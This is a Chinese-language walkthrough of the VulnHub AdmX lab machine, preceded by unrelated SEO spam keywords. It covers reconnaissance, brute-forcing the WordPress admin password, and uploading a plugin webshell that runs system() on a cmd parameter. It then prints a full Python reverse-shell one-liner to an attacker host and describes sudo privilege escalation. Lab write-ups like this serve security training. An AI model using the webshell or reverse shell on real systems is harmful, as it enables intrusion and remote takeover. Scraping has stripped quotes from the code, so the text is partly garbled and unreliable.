沈阳网站建设,全国企业信息公示查询系统官网,做自己的卡盟网站,社交平台运营是做什么的0x00前言
因为环境问题#xff0c;此次靶场都放在vm上。都为NAT模式。
靶机地址: https://download.vulnhub.com/admx/AdmX_new.7z
需要找到两个flag文件。
0x01信息搜集
搜集IP 确认目标IP为172.16.8.131#xff0c;进一步信息搜集
获取端口开放情况#xff0c;版本信…0x00前言
因为环境问题此次靶场都放在vm上。都为NAT模式。
靶机地址: https://download.vulnhub.com/admx/AdmX_new.7z
需要找到两个flag文件。
0x01信息搜集
搜集IP 确认目标IP为172.16.8.131进一步信息搜集
获取端口开放情况版本信息等等。 发现目标有80 端口开启。可以去看看。 发现没有什么功能点然后直接目录扫描。 发现关键词WP 去查看。发现新页面 点击标签发现会自动跳转一个网址通过查看数据包代码里已经把IP地址写死了。但是可以利用BP来将响应包的数据替换掉。
0x02响应包替换。 添加两条规则即可。
替换后(在浏览器上使用插件要把本地的规则放开让BP能抓住本地网络的数据包) 看了一圈没有什么可疑的地方继续信息搜集。 发现admin路径 经过测试发现。输入admin和输入其他是不一样的所以由此判断。用户名为admin.
直接爆破密码即可。adam14
0x03反弹shell
成功进入后台。 通过上网搜集资料发现 可以通过插件主题media等功能点上传木马来进行getshell.
在插件编辑功能点发现了php代码但是不能保存。 上传的文件必须是zip文件还得要符合规则
?php
/**
* Plugin Name: Shell
* Plugin URI: https://x.github.io
* Description: WP Webshell for Pentest
* Version: 1.0
* Author: kalpa
* Author URI: https://x.github.io
* License: https://x.github.io
*/if(isset($_GET[cmd]))
{system($_GET[cmd]);
}
?
把上面的文件写入php文件打包成zip上传即可。 然后把插件激活即可。 http://172.16.8.131/wordpress/wp-content/plugins/shell.php?cmdwhoami 访问上面的命令即可命令执行。 然后尝试反弹shell.本次使用python反弹shell. python3 -c import socket,subprocess,os;ssocket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((172.16.8.132,2222));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(/bin/bash) 反弹成功。
0x04提权
信息搜集尝试提权。
进入/etc/passwd 查看 发现一个wpadmin用户。去用户目录查看 发现需要wpadmin 有一个txt可能是flag文件。尝试以wpadmin登陆
在wp的配置文件中找到了。如下信息。 尝试连接数据库。 无果。
最后使用登陆 wordpress的密码成功登陆 wpadmin. 0x05二次提权。
尝试把权限提升到root. sudo提权 使用之前获取到的数据库密码尝试提权。 进过测试发现可以直接使用系统命令。
0x06 拿到第二个flag 0x07总结
靶场用到的一些技术点BP替换响应包wordpress框架的测试sudo提权。
